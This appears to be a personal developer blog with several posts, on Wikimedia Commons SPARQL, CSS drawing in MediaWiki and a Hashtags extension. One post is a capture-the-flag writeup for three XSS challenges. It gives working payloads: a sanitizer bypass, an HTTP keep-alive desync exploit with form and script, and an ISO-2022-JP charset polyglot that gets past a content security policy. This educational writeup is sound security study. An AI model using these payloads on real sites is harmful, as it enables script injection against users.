Friday, February 28, 2025

Exploring structured data on commons

 Recently I've been helping Yaron do some SPARQL query optimization for his site Commons Walkabout.

Its a cool site. It lets you explore the media on Wikimedia Commons by filtering through various metadata fields.

For example - bodies of water located in a place that is in Ireland.

Its addicting too. The media with the best quality metadata tends to be those donated by museums, which often means they are quite interesting.

An image the commons walkabout app showed me that I thought was pretty: Arabah desert in 1952 photographed by Benno Rothenberg

Structured data on Commons

As a result of helping with the optimization, I've been exploring structured (Wikidata-style) data on commons.

The structured data project has been a bit controversial. I think there is a feeling in the community that WMF abandoned the project at the 90% done point. It does mostly work, but there is still a lot of rough edges that make it less successful than it would otherwise be. Tools for authoring, interacting and maintaining the metadata are lacking from what I understand. Most files are not as described by metadata as they ought to be. Importantly there is now a dual system of organization - the traditional free text image description pages and category system, along with the newer structured metadata. Doing both means we're never fully committed to either.

Source: XKCD

The biggest criticism is the situation with the commons query service (See T297995 and T376979). Right now the service requires you to log in first. In the beginning this sounded like it would be a temporary restriction, but it now appears permanent.
 
Logging in is a big issue because it makes it impossible to do client side apps that act as a front-end to the query service (Its not theoretically impossible, but the WMF's implementation of logging in doesn't support that). The auth implementation is not very user friendly, which is a significant hindrance, especially when many people who want to do queries aren't necessarily professional programmers (For example, the official instructions suggest using the browser dev console to look up the value of certain cookies as one of the steps to use the system). Some users have described the authentication system as such a hindrance that it makes more sense to shut the whole thing down than to keep it behind auth.

The SPARQL ecosystem is designed to be a linked ecosystem where you can query remote databases. The auth system means commons query service can't be used in federation. It can talk to other servers but other servers cannot talk to it.

Its a bit hard to understand why WMF is doing this. Wikidata is fully open, and that is a much larger dataset of interest to a much broader group of people. If blazegraph is hard (Which don't get me wrong, i am sure it is), the commons instance should be trivial compared to the Wikidata one. You can just look at the usage graphs that clearly show almost nobody using the commons query service relative to the wikidata query service. The commons query service seems to be averaging about 0 requests per minute with occasional spikes up to 15-40 reqs/min. In comparison, the wikidata query service seems to average about 7500 reqs/minute

I've heard various theories: That this is the beginning of an enshitification process so that Wikimedia can eventually sell access under the Wikimedia Enterprise banner or that they don't want AI companies to scrape all the data (Why an AI company would want to scrape this but not wikidata and why we would want to prevent them, I have no idea). These aren't really super convincing to me.

I suspect the real reason is that WMF has largely cut funding to the structured data project. That just leaves a sysadmin team responsible for the blazegraph query end point. However normally such a team would work in concert with another team more broadly responsible for sdc. With no such other team, the blazegraph sysadmin team is very scared of being sucked into a position where suddenly they are solely responsible for things that should be outside their team's remit. They really don't want that to happen (hard to blame them), so they are putting the breaks on moving things forward with the commons query service.

This is just a guess. I don't know for sure what is happening or why, but that is the theory that makes the most sense to me.

The data model

Regardless of the above, the structured data project and SPARQL is really cool. I actually really like it.
 
While playing with it though, some parts do seem kind of weird to me.

Blank nodes for creator

The creator property says who created the image. Ideally the value is supposed to be a Q-number, but many creators don't have one.

The solution is to use a blank node. This makes sense, blank nodes in RDF are placeholders. They aren't equal to any other node, but allow you to specify properties.

If the relationship chain was:

<sdc:Some image> <wdt:P170 (creator)> < blank node > <wdt:P4174 Wikimedia Username> "Some username"

That would be fine. However its not. Instead creator property is rectified so that <wdt:P4174 Wikimedia Username> "Some username" is modifying the creator predicate instead of being a property of the blank node.

This feels so ontologically weird to me. It kind of weird we have to resort to such a hack for what is undoubtedly the main use case of this system.

Functionally dependent predicates

Some predicates functionally depend on the file in question. I feel like these should be added by the system. They should not be controlled or edited by the user.

For example P3575 data size. That's technical metadata. Users should not be responsible for inserting it. Users should not be able to change it. The fact that they are is a poor design in my opinion. Similarly for P2048 height, P2049 width, P1163 media type, P4092 checksum.

I find P1163 media type (aka the mime type of the file) especially weird. Why is this a string? Surely it should be the Q number of the file format in question if we're going to be manually filling it out?

The especially weird part is some of this data is automatically added to the system in the schema namespace. The system automatically adds schema:contentSize, schema:encodingFormat, schema:height, schema:width, schema:numberOfPages which are equivalent to some of these properties. So why are we duplicating them by hand (or by bot)?

At the same time, there seems to be a lot missing from schema. I don't see sha1 hash (sha1 isn't the best hash since it is now broken, but its the one MediaWiki uses internally for image). I'd love to see XMP file metadata included here as well, since it is already in RDF format.

The thing really missing (unless i missed it) is it seems impossible to get the url of the file description page or even the mediawiki page title, without string manipulation. This seems like a bizarre omission. I should be able to go from the canonical url at commons to the SDC item.

Querying the system

Querying the system can be a bit tricky sometimes because the data is usually spread between commons and wikidata, so you have to make use of SERVICE clauses to query the remote data, which can be slow.

The main trick seems to be to try and minimize the cross database communication. If you have a big dataset, try and minimize it before communicating with the remote database (or the label service).

Copious use of named subqueries (due to them being isolated by the optimizer) can really help here.

If you are fetching distinct terms (or counts of distinct terms) ensuring that blazegraph can use the distinct term optimization is very helpful.  It seems like the blazegraph query optimizer isn't very good and often cannot use this optimization even when it should. Making the group by very simple and putting it into a named subquery can help with this.
 
The distinct term optimization is critically important for running fast aggregation queries. Often it makes sense to first get the list of distinct terms you are interested in and their count (if applicable) in a named subquery, then go and fetch information for each item or filter them instead of doing it all in one group by.

If you have a slow query that involves any sort of group by, the first thing i would suggest is to try and extract a simple group by into a subquery (by simple I mean: only 1 basic graph pattern, no services, grouping by only 1 term, and either no aggregate functions or the only aggregrate function being count(*)) and then use the results of that query as the basis of the rest of your query.

If its still too much, using the bd:sample service can be really helpful. This runs the query over a random subset of results instead of the whole thing. If you just want to get the broad trends this can often be good enough.

The most complicated thing to query seems to be the P170 creator predicate. There are 72 million items with that predicate, the vast majority are blank nodes, so the number of distinct terms is in the millions (Even for files with the same creator, they are considered distinct of they are blank nodes). Queries involving it seem to almost always time out.
 
Initially I thought the best that could be done was sampling and interpolating. For example, this query that gives you the top creators (who have a Q numbers). The numbers aren't exactly right, but they seem to be within the right order of magnitude.

Unfortunately filtering via wikibase:isSomeValue() is very slow so we can't just filter out the blank nodes. I did find a hack though.  In general blazegraph arranges blank nodes at the end of the result set (or at least, it seems so in this case). If you do a subquery of distinct terms with a limit of about 10,000 you can get all the non-blank nodes (Since there are only about 7200 of them and they are at the beginning). This is hacky since you can't use range queries with URI values and you can't even put an order by on the query or it will slow down, so you just have to trust blaze graph is consistently returning things in the order you want even though it is by no means required to. It seems to work.. For example, here is an example table using this method counting the number of images created by creators (with Q numbers) grouped by their cause of death. A bit morbid, but is is fascinating you can make such an arbitrary query.

Conclusion

Anyways, I do find RDF and SPARQL really cool, so its been fun poking around in commons' implementation of it. Check out Yaron's site https://commonswalkabout.org/ it is really cool.


Thursday, January 30, 2025

Happy (belated) new year

 I was going to write a new years post. Suddenly it's almost February.

Last year I had the goal of writing at least 1 blog post a month.

 I was inspired by Tyler Cipriani who wrote a post talking about his goal of writing at least once a month. It seemed like a reasonable goal to help practice writing. I've often wanted to maintain a blog in the past, but would always find I petered out after a few posts. So last year I set myself the goal of at least once a month.

How'd I do?

Ok I guess. I wrote 9 blog posts last year. Short of my goal of 12, but still not terrible. Looking back, I realize that I wrote 9 in 2023 and 11 in 2022, so I guess the goal didn't actually increase my writing. Nonetheless I'm still pretty happy that I was writing posts throughout the year.

Based on blogger's internal analytics, it seems like people like when I do CTF writeups. For some unclear reason my post about MUDCon got a tremendous amount of views relative to my other posts. However, the real goal is more to practice writing than to get views, so I suppose it doesn't matter much. That said, I do write the CTF writeups in the hope that others can learn from them, so it is nice to see that people read them.

On to next. Maybe this year I'll actually make it to once a month - I'd like to keep going with this goal. I think I'll try and write more shorter off the cuff things (Like this) and less big technical posts.

This year

While its already been a month and I've already mostly forgotten about my goals. But I did write some down.

I want this to be a year of trying new things. I want to try and branch out to new a different things.

I want to explore my creative side a bit more. To be clear, I do think there is a lot of creativity in computer programming, but I also want to try more traditionally creative things. Paint some pictures! I've been taking a beginner acrylic painting class at the local community center, which has been great so far. Maybe I should try and join the two interests and make a silly computer game.

I'd also like to explore different computer things. I've been doing MediaWiki stuff for a while now, but I don't want that to be the only thing I ever do. I'd like to try and direct my open source contributions towards things I haven't done before. Maybe things that are more low level than php web apps. Perhaps I should learn rust! I'd like to work on stuff where I feel like I'm learning and I think it would be cool to spend some time learning more about traditional CS concepts (algorithms and what not). Its been a long time since I was in university and learning about that sort of thing. Maybe it would be fun to brush up. In my current programming work its very rare for that sort of thing to be relevant.

Where I do keep with open source contributions in the MediaWiki/Wikimedia sphere of influence, I want to work on things that are unique or new. Things that, whether they are good or bad ideas, at least open up new possibilities for discussion. I can't help but feel that MediaWiki land has been a little stagnant. So many of the core ideas are from late 2000s. They've been incrementally improved upon, but there really isn't anything new. Both in Wikimedia land and in third party MediaWiki land.  Perhaps that is just a sign of a maturing ecosystem, but I think its time to try some crazy new ideas. Some will work and some will fail, but I want to feel like I'm working on something new that makes people think of the possibilities, not just improving what is already there (Not that there is anything wrong with that, maintenance is critical and under appreciated, its just not what i want to work on right now, at least not as a volunteer)

I think I've gotten a start in that direction with the calculator project that WikiProject med funded me to do. It spurned a lot of interesting discussion and ideas, which is the sort of thing I want to be involved with.

Maybe I'll explore Wikidata a bit more. I always found RDF databases kind of interesting.

On the third party MW side, I've felt for a long time that we could use some different ideas for querying and reporting in MediaWiki (Cargo and SMW is cool, but I don't think they quite make the right trade-offs). I'd love to explore ideas in that space a little bit.

So in conclusion, what is the yearly goals?

  • I think I want to be a little more intentional in planning out my life
  • I want my open source MediaWiki contribs to be more along prototyping new and unique ideas. I want to avoid being sucked into just fixing things at Wikimedia (After all, that's why WMF allegedly has paid staff).
  • I want to try and pursue creative hobbies outside of computer programming.
  • I want to try and do more programming outside of my MediaWiki comfort zone.

See you back here this time next year to see how I did.


Thursday, January 16, 2025

Signpost article on {{Calculator}}

 The most recent issue of the Wikipedia Signpost published an article I wrote about the {{calculator}} series of templates, which I worked on.

 The signpost is Wikipedia's internal newspaper. I read it all the time. Its really cool to have contributed something to it. 

So what's this all about?

Essentially I was hired by Wiki Project Med, to make a script to add medical calculators to their wiki, MDWiki.  For example, you might have a calculator to calculate BMI, where the reader enters their weight and height. After being used on MDWiki, the script made its way to Wikipedia.

 The goal of this was to make something user programmable, so that users could solve their own problems without having to wait on developers. The model we settled on was a spreadsheet-esque one. You can define cells that readers can write in, and you can define other cells that update based on some formula.

Later we also allowed manipulating CSS, to provide more interactivity. This opened up a surprising number of opportunities, such as interactive diagrams and demonstrations.

See the Signpost article for more details: https://en.wikipedia.org/wiki/Wikipedia:Wikipedia_Signpost/2025-01-15/Technology_report and let me know what you think.

Tuesday, December 31, 2024

Drawing with CSS in MediaWiki

One thing you aren't allowed to do when writing pages in MediaWiki, is use SVG elements.

You can include SVG files, but you can't dynamically draw something based on the contents of the page.

There are two schools of thought on adding features to MediaWiki page formatting.

Some people think we should give low level tools and let the users figure it out. An example (in my opinion) of this is Scribunto (Lua support). This let editors create small scripts in the lua programming language as macros. Its fairly low level - learning to program is complicated. However it gave users ultimate flexibility and only a few users need to learn how to make lua scripts. The other users could just use them without understanding how they work.

The other school of thought is to give users high level tools. For example, the upcoming Charts extension or the older easytimeline extension. This gives the users some flexibility, but many of the details are hidden. The lack of flexibility sounds like a downside, but there are some benefits. Its easier to ensure everything is consistent when its managed by the system instead of the user. Its easier to ensure everything meets performance requirements, accessibility requirements, etc. Its easier to ensure there is alternative content where the rich content can't be supported (e.g. perhaps in some app).

I tend to lean towards the former, as I think the extra flexibility spurns creativity. Users will take the tools and use them in ways you never imagined, which I think is a good thing (not to mention more scalable), but I understand where the other side is coming from.

One of the limitations of MediaWiki, is a template author can't really draw things dynamically. Sure they can use uploaded images and fancy HTML, but they can't use true server-side dynamically generated graphics because SVG elements aren't allowed in wikitext. Sometimes people use quite ingenious html hacks to get around this - e.g. {{Pie chart}} uses CSS borders to make pie graphs. For the most part though this niche is filled with high level extensions like the former Graph extension or the upcoming Charts extension, which let users insert a graph based on some specification. This is great if the graph the extension generates is what the user needs, but what if their requirements differ slightly?

Personally I think we should just do both - let users have at it with SVG, while also providing the fancier high level extensions. See what they like best. (Some people argue against embedded svg on security grounds, but its really no different than HTML. You just need to whitelist safe elements/attributes and not allow risky stuff).

Modern CSS

Recently though, I realized that CSS has advanced a lot, and you don't really need SVG to do drawings. You can do it in pure CSS.

CSS has a property called "clip-path". This allows specifying a clipping path in SVG path syntax. Only the parts inside the path show through.

SVG path syntax is essentially how to tell the computer, go to this point, draw a line to this point, from there make a curve to some other point, and so on and so forth. Essentially instructing the computer how to draw a picture.

This allows drawing a lot of stuff you would normally need SVG for. To be sure, there are a lot of other things SVGs do, but at its core, this is the main drawing part.

Here is an example of a smiley face and the word Example in fancy writing (Taken from [[File:Example.svg]]) in pure css

In fact, i made a start on an implementation of the canvas API in lua using this as the output mode: https://en.wikipedia.org/wiki/Module:Sandbox/Bawolff/canvas

Limitations

A big limitation is lack of stroking. The clip-path thing works great for filling regions, but it doesn't work for stroking paths.

When drawing - to stroke means to draw an outline, where to fill means you draw a shape and fill everything inside of it.

This doesn't seem insurmountable though. Most actual rasterization software works by flattening curved paths to lines, we could do the same thing in Lua, although it might not be the most efficient solution in terms of outputted markup.

Much of the time, I was actually surprised how much of the Canvas spec has CSS equivalents. Even obscure stuff - what interpolation do you want for rendered images? CSS has image-rendering property for that.

There are some things with no equivalent. We can't do anything that depends on client side, can't get font metrics, can't get the pixel data of an image, etc. Centering text the way canvas does it actually seems kind of hard. Composition operators are mostly not supported. Blending operators can be, but won't work properly with images. A bunch of other small things aren't supported, mostly involving more complex aspects of text layout.

On the whole though, I'm shocked at how far I got and how much of the stuff I don't have yet seems like a simple matter of programming.

There is also the possibility of limited interactivity with this, using :hover CSS and CSS animations (although transitioning paths probably doesn't work great, it seems possible in theory). Possibly even combined with {{calculator}} to allow limited interaction via form controls.

Try out [[Module:Sandbox/Bawolff/canvas]] if you are curious.

Sunday, December 1, 2024

Writeup for the flatt XSS challenge

This November, the company Flatt put out three XSS challenges - https://challenge-xss.quiz.flatt.training/ ( source code at https://github.com/flatt-jp/flatt-xss-challenges )

These were quite challenging and I had a good time solving them. The code for all of my solutions is at http://bawolff.net/flatt-xss-challenge.htm. Here is how I solved them.

Challenge 1 (hamayan)

This was in my opinion, the easiest challenge.

The setup is as follows - We can submit a message. On the server side we have:

  const sanitized = DOMPurify.sanitize(message);
  res.view("/index.ejs", { sanitized: sanitized });

with the following template:

    <p class="message"><%- sanitized %></b></p>
    <form method="get" action="">
        <textarea name="message"><%- sanitized %></textarea>
        <p>
            <input type="submit" value="View 👀" formaction="/" />
        </p>
    </form>

As you can see, the message is sanitized and then used in two places - in normal HTML but also inside a <textarea>.

The <textarea> tag is not a normal HTML tag. It has a "text" content model. This means that HTML inside it is not interpreted and the normal HTML rules don't apply

Consider the following HTML as our message: <div title="</textarea><img src=x onerror=alert(origin)>">

In a normal html context, this is fairly innocous. It is a div with a title attribute. The title attribute looks like html, but it is just a title attribute.

However, if we put it inside a <textarea>, it gets interpreted totally differently. There are no elements inside a textarea, so there are no attribtues. The </textarea> thus closes the textarea tag instead of being a harmless attribute:

<textarea><div title="</textarea><img src=x onerror=alert(origin)>">

Thus, once the textarea tag gets closed, the <img> tag is free to execute.

https://challenge-hamayan.quiz.flatt.training/?message=%3Cdiv%20title=%22%3C/textarea%3E%3Cimg%20src=x%20onerror=alert(origin)%3E%22%3E

Challenge 2 (Ryotak)

This challenge was probably the hardest for me.

The client-side setup

We have a website. You can enter some HTML and save it. Once saved, you are given an id number in the url, the HTML is fetched from the server, it is sanitized and then set to the innerHTML of a div.

The client-side sanitization is as follows:

        const SANITIZER_CONFIG = {
            DANGEROUS_TAGS: [
                'script',
                'iframe',
                'style',
                'object',
                'embed',
                'meta',
                'link',
                'base',
                'frame',
                'frameset',
                'svg',
                'math',
                'template',
            ],

            ALLOW_ATTRIBUTES: false
        }

        function sanitizeHtml(html) {
            const doc = new DOMParser().parseFromString(html, "text/html");
            const nodeIterator = doc.createNodeIterator(doc, NodeFilter.SHOW_ELEMENT);

            while (nodeIterator.nextNode()) {
                const currentNode = nodeIterator.referenceNode;
                if (typeof currentNode.nodeName !== "string" || !(currentNode.attributes instanceof NamedNodeMap) || typeof currentNode.remove !== "function" || typeof currentNode.removeAttribute !== "function") {
                    console.warn("DOM Clobbering detected!");
                    return "";
                }
                if (SANITIZER_CONFIG.DANGEROUS_TAGS.includes(currentNode.nodeName.toLowerCase())) {
                    currentNode.remove();
                } else if (!SANITIZER_CONFIG.ALLOW_ATTRIBUTES && currentNode.attributes) {
                    for (const attribute of currentNode.attributes) {
                        currentNode.removeAttribute(attribute.name);
                    }
                }
            }

            return doc.body.innerHTML;
        }

If that wasn't bad enough, there is also server-side sanitization, which I'll get to in a bit.

Client side bypass

This looks pretty bad. It disallows all attributes. It disallows <script> which you more or less need to anything interesting if you don't have event attributes. It disallows <math> and <svg> which most mXSS attacks rely on.

However there is a mistake:

        for (const attribute of currentNode.attributes) {
              currentNode.removeAttribute(attribute.name);
        }

Which should be:

        for (const attribute of Array.from(currentNode.attributes)) {
              currentNode.removeAttribute(attribute.name);
        } 

The attributes property is a NamedNodeMap. This is a live class that is connected to the DOM. This means that if you remove the first attribute, it is instantly deleted from this list, with the second attribute becoming the first, and so on.

This is problematic if you modifythe attributes while iterating through them in a loop. If you remove an attribute in the first iteration, the second attribute then becomes the first. The next iteration then goes to the current second attribute (previously the third). As a result, what was originally the second attribute gets skipped.

In essence, the code only removes odd attributes. Thus <video/x/onloadstart=alert(origin)><source> will have only the x removed, and continue to trigger the XSS.

For reasons that will be explained later, it is important that our exploit does not have any whitespace in it. An alternative exploit might be <img/x/src/y/onerror=alert(origin)>

The server-side part

That's all well and good, but the really tricky part of this challenge is the server side part.

        elif path == "/api/drafts":
            draft_id = query.get('id', [''])[0]
            if draft_id in drafts:
                escaped = html.escape(drafts[draft_id])
                self.send_response(200)
                self.send_data(self.content_type_text, bytes(escaped, 'utf-8'))
            else:
                self.send_response(200)
                self.send_data(self.content_type_text, b'')
        else:
            self.send_response(404)
            self.send_data(self.content_type_text, bytes('Path %s not found' % self.path, 'utf-8'))

As you can see, the server side component HTML-escapes its input.

This looks pretty impossible. How can you have XSS without < or >?

My first thought was maybe something to do with charset shenanigans. However this turned out to be impossible since everything is explicitly labelled UTF-8 and the injected HTML is injected via innerHTML so takes the current document's charset.

I also noticed that we could put arbitrary text into the 404 error page. The error page is served as text/plain, so it would not normally be exploitable. However, the JS that loads the html snippet uses fetch() without checking the returned content type. I thought perhaps there would be some way to make it fetch the wrong page and use the 404 result as the html snippet.

My first thought was maybe there is a different in path handling between python urllib and WHATWG URL spec. There is in fact lots of differences, but none that seemed exploitable. There was also no way to inject a <base> tag or anything like that. Last of all, the fetch url starts with a /, so its always going to be relative just to the host and not the current path.

I was stuck here for quite a long time.

Eventually I looked at the rest of the script. There are some odd things about it. First of all, it is using python's BaseHTTPRequestHandler as the HTTP server. The docs for that say in giant letters: "Warning: http.server is not recommended for production. It only implements basic security checks.". Sounds promising.

I also couldn't help but notice that this challenge was unique compared to the others - it was the only one hosted on an IP address with just plain HTTP/1.1 and no TLS. The other two were under the .quiz.flatt.training domain, HTTP/2 and presumably behind some sort of load balancer.

All signs pointed to something being up with the HTTP implementation.

Poking around the BaseHTTPRequestHandler, I found the following in a code comment: "IT IS IMPORTANT TO ADHERE TO THE PROTOCOL FOR WRITING!". All caps, must be important.

Lets take another look at the challenge script. Here is the POST handler:

    def do_POST(self):
        content_length = int(self.headers.get('Content-Length'))
        if content_length > 100:
            self.send_response(413)
            self.send_data(self.content_type_text, b'Post is too large')
            return
        body = self.rfile.read(content_length)
        draft_id = str(uuid4())
        drafts[draft_id] = body.decode('utf-8')
        self.send_response(200)
        self.send_data(self.content_type_text, bytes(draft_id, 'utf-8'))

    def send_data(self, content_type, body):
        self.send_header('Content-Type', content_type)
        self.send_header('Connection', 'keep-alive')
        self.send_header('Content-Length', len(body))
        self.end_headers()
        self.wfile.write(body)


Admittedly, it took me several days to see this, but there is an HTTP protocol violation here.

The BaseHTTPRequestHandler class supports HTTP Keep-alive. This means that connections can be reused after the request is finished. This improves performance by not having to repeat a bunch of handshake steps for every request. The way this works is if the web server is willing to keep listening for more requests on a connection, it will set the Connection: Keep-Alive header. The challenge script always does this.

The problem happens during the case where a POST request has too large a body. The challenge script will return a 413 error if the POST request is too large. This is all fine and good. 413 is the correct error for such a situation. However it immediately returns after this, not reading the POST body at all, leaving it still in the connection buffer. Since the Connection: Keep-alive header is set, the python HTTP server class thinks the connection can be reused, and waits for more data. Since there is still data left in the connection buffer, it gets that data immediately, incorrectly assuming it is the start of a new request. (This type of issue is often called "client-side desync")

What the challenge script should do here is read Connection-Length number of bytes and discard them, removing them from the connection buffer, before handing the connection off to the base class to wait for the next request. Alternatively, it could set Connection: Close header, to signal that the connection can no longer be reused (This wouldn't be enough in and of itself, but the python base class looks for this). By responding without looking at the POST body, the challenge script desynchronizes the HTTP connection. The server thinks we are waiting on the next request, but the web browser is still in the middle of sending the current request.

To summarize, this means that if we send a large POST request, the web server will treat it as two separate requests instead of a single request.

We can use this to poision the connection. We send something that will be treated as two requests. When the browser sends its next request, the web server responds with part two of our first request, thus causing the web browser to think the answer to its second request is the answer to part two of of the first request.

The steps of our attack would be as follows:

  • Open a window to http://34.171.202.118/?draft_id=4ee2f502-e792-49ae-9d15-21d7fffbeb63 (The specific draft_id doesn't matter as long as its consistent). This will ensure that the page is in cache, as we don't want it to be fetched in the middle of our attack. Note that this page is sent with a Cache-Control: max-age=3600 header, while most other requests do not have this header.
  • Make a long POST request that has a POST body that looks something like GET <video/x/onloadstart=alert(origin)><source> HTTP/1.1\r\nhost:f\r\n;x-junk1: PADDING..  (This is why our payload cannot have whitespace, it would break the HTTP request which is whitespace delimited)
  •  Navigate to http://34.171.202.118/?draft_id=4ee2f502-e792-49ae-9d15-21d7fffbeb63. Because we preloaded this and it is cachable, it should already be in cache. The web browser will load it from disk not the network. The javascript on this page will fetch the document with that doc_id in the url via fetch(). This response does not have a caching header, so the web browser makes a new request on the network. Since half of the previous POST is still in the connection buffer, the webserver responds to that request instead of the one the browser just made. The result is a 404 page containing our payload. The web browser sees that response, and incorrectly assumes it is for the request it just made via fetch(). It is sent with a text/plain content type and 404 status code but the javascript does not care.

The only tricky part left is how to send a POST with such fine-grained control over the body.

HTML forms have a little known feature where they can be set to send in text/plain mode. This works perfect for us. Thus we have a form like:

<form method="POST" target="ryotak" enctype="text/plain" action="http://34.171.202.118/" id="ryotakform">
<input type="hidden"
name="GET <video/x/onloadstart=alert(origin)><source> HTTP/1.1&#xd;&#xa;host:f&#xd;&#xa;x-junk1: aaaaaaaaaaaaaaaaaaaaaa..." value="aa">
</form>

 The rest of the exploit looks like:

    window.open( 'http://34.171.202.118/?draft_id=4ee2f502-e792-49ae-9d15-21d7fffbeb63', 'ryotak' );
    setTimeout( function () {
        document.getElementById( 'ryotakform' ).submit();
        setTimeout( function () {
            window.open( 'http://34.171.202.118/?draft_id=4ee2f502-e792-49ae-9d15-21d7fffbeb63', 'ryotak' );
        }, 500 );
    }, 5000 );

 The timeouts are to ensure that the web browser had enough time to load the page before going to the next step.

You can try it out at http://bawolff.net/flatt-xss-challenge.htm

Challenge 3 (kinugawa)

Note: My solution works on Chrome but not Firefox.

The Setup 

  <meta charset="utf-8">
  <meta http-equiv="Content-Security-Policy"
    content="default-src 'none';script-src 'sha256-EojffqsgrDqc3mLbzy899xGTZN4StqzlstcSYu24doI=' cdnjs.cloudflare.com; style-src 'unsafe-inline'; frame-src blob:">

<iframe name="iframe" style="width: 80%;height:200px"></iframe>

[...]

      const sanitizedHtml = DOMPurify.sanitize(html, { ALLOWED_ATTR: [], ALLOW_ARIA_ATTR: false, ALLOW_DATA_ATTR: false });
      const blob = new Blob([sanitizedHtml], { "type": "text/html" });
      const blobURL = URL.createObjectURL(blob);
      input.value = sanitizedHtml;
      window.open(blobURL, "iframe");
 

We are given a page which takes some HTML, puts it through DOMPurify, turns it into a blob url then navigates an iframe to that blob.

Additionally there is a CSP policy limiting which scripts we can run.

The solution

The CSP policy is the easiest part. cdnjs.cloudflare.com is on the allow list which contains many js packages which are unsafe to use with CSP. We can use libraries like angular to bypass this restriction.

For the rest - we're obviously not going to find a 0-day in DOMPurify. If I did, I certainly would have lead the blog post with that.

However, since blob urls are separate documents, that means that they are parsed as a fresh HTML document. This includes charset detection (Since the mime type of the Blob is set to just text/html not text/html; charset=UTF-8). DOMPurify on the other hand is going to assume that the input byte stream does not need any character set related conversions.

So in principle, what we need to do here is create a polygot document. A document that is safe without any charset conversions applied, but becomes dangerous when interpreted under a non-standard character set. Additionally we then need to get the blob url interpreted as that character set.

There are a small number of character sets interpreted by web browsers. There used to be quite a lot of dangerous ones to chose from such as UTF-7 or hz. However most of these got removed and the only remaining charset that is easy to make dangerous is ISO-2022-JP.

The reason that ISO-2022-JP is so useful in exploits is that it is modal. It is actually 4 character sets in one, with a special code to change between them. If you write "^[$B" it switches to Japanese mode. "^[(B" on the other hand switches to ASCII mode. (^[ refers to ASCII character 0x1B, the escape character. You might also see it written as \x1B, %1B, ESC or \e). If we are already in the mode that the escape sequence switches to, then the character sequence does nothing and it is removed from the byte stream.

This means that <^[(B/style> will close a style tag when the document is in ISO-2022-JP mode, but is considered non-sense in UTF-8 mode.

Thus we might have a payload that looks like the following: (Remembering that ^[ stands for ascii ESC):

<style> <^[(B/style>
  <^[(Bscript src='https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js'><^[(B/script>
  <^[(Bscript src='https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.js'>
  <^[(B/script>
  <^[(Bdiv ng-app ng-csp>
    {{$on.curry.call().alert($on.curry.call().origin)}}
  <^[(B/div>
</style>

DOMPurify won't see <^[(B/style> as a closing style tag and thinks the whole thing is the body of the style tag. To prevent mXSS, DOMPurify won't allow things that look like html tags (a "<" followed by a letter) inside <style> tags, so those are also broken up with ^[(B. A browser interpreting this as ISO-2022-JP would simply not see the "^[(B" sequences and treat it as normal HTML.

Now all we need to do is to convince the web browser that this page should be considered ISO-2022-JP.

The easiest way of doing that would be with a <meta charset="ISO-2022-JP"> tag. Unfortunately DOMPurify does not allow meta tags through. Even if it did, this challenge configures DOMPurify to ban all attributes. (We can't use the ^[(B trick here, because it only works after the document is already in ISO-2022-JP mode).

Normally we could use detection heuristics. In most browsers, if a document does not have a charset in its content type nor a meta tag, the web browser just makes a guess based on its textual content of the beginning of the document. If the browser sees a bunch of ^[ characters used in a way that would be valid in ISO-2022-JP and no characters that would be invalid in that encoding (such as multibyte UTF-8 characters), it knows that this document is likely ISO-2022-JP, so guesses that as the charset of the document.

However this detection method is used as a method of last resort. In the case of an iframe document (which does not have a better method such as charset in the mime type or meta tag), the browser will use the parent windows charset, instead of guessing based on document contents.

Since this parent document uses UTF-8, this stops us.

However, what if we didn't use an iframe?

The challenge navigates the iframe by using its name. What if there was another window with the same name? Could we get that window to be navigated instead of the iframe?

If we use window.open() to open the challenge in a window named "iframe", then the challenge would navigate itself instead of the iframe. The blob is now a top-level navigation, so cannot take its charset from the parent window. Instead the browser has no choice but to look at the document contents as a heuristic, which we can control.

The end result is something along the lines of:

window.open( 'https://challenge-kinugawa.quiz.flatt.training/?html=' +
   encodeURIComponent( "<div>Some random Japanese text to trigger the heuristic: \x1b$B%D%t%#%C%+%&$NM5J!$J2HDm$K@8$^$l!\"%i%$%W%D%#%RBg3X$NK!2J$K?J$`$b!\"%T%\"%K%9%H$r$a$6$7$F%U%j!<%I%j%R!&%t%#!<%/$K;U;v$9$k!#$7$+$7!\";X$N8N>c$K$h$j%T%\"%K%9%H$rCGG0!\":n6J2H$H$J$k!#%t%#!<%/$NL<$G%T%\"%K%9%H$N%/%i%i$H$NNx0&$H7k:'$O%7%e!<%^%s$NAO:n3hF0$KB?Bg$J1F6A$r5Z$\$7$?!#\x1b(Bend <style><\x1b(B/style><\x1b(Bscript src='https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js'><\x1b(B/script><\x1b(Bscript src='https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.js'><\x1b(B/script><\x1b(Bdiv ng-app ng-csp>{{$on.curry.call().alert($on.curry.call().origin)}}<\x1b(B/div></style>begin\x1b$B%sE*8e\x1b(Bend</div>" ),
"iframe" );

Try it at http://bawolff.net/flatt-xss-challenge.htm

Conclusion

These were some great challenges. The last two especially took me a long time to solve.

Tuesday, October 1, 2024

Hashtags and implementing extensions in MediaWiki by modifying services

 Recently I decided to make a Hashtags extension for MediaWiki.

The idea is - if you add something like #foo to your edit summary, that becomes a link in RecentChanges/history/etc, which you can click on to view other edits so tagged.

I implemented this using MediaWiki's newish services framework. This was the first time I used this as an extension mechanism, so I thought I'd write a blog post on my thoughts.

Why Hashtags

The main idea is that users can self-group their edits if they are participating in some sort of campaign. There are already users doing this and external tools to gather statistics about it. For example Wikimedia hashtag search so there seems to be user demand.

MediaWiki also has a feature called "change tags". This allows edits to be tagged in certain ways and searched. Normally this is done automatically by software such as AbuseFilter. It is actually possible for users to tag their own edits, provided that tag is on an approved list. They just have to add a secret url parameter (?wpChangeTags) or edit by following a link with the appropriate url parameter. As you can imagine, this is not easily discoverable.

I've always been excited about the possibility of hashtags. I like the idea that it is a user-determined taxonomy (so-called folksonomy). You don't have to wait for some powerful gate-keeper to approve your tag. You can just be bold, and organize things in whatever way is useful. You don't have to discover some secret parameter. You can just see that other people write a specific something in their edit summaries and follow suite.

This feels much more in line with the wiki-way. You can be bold. You can learn by copying.

The extension essentially joins both methods together, by automatically adding change tags based on the contents of the edit summary.

Admittedly, the probability of my extension being installed on Wikipedia is probably pretty low. Realistically i am not even trying for that. But one can dream.

For more information about using the extension see https://www.mediawiki.org/wiki/Extension:Hashtags

How the extension works

There are a couple things the extension needs to do:

  • When an edit (or log entry) is saved, look at the edit summary, add appropriate tags based on that edit summary
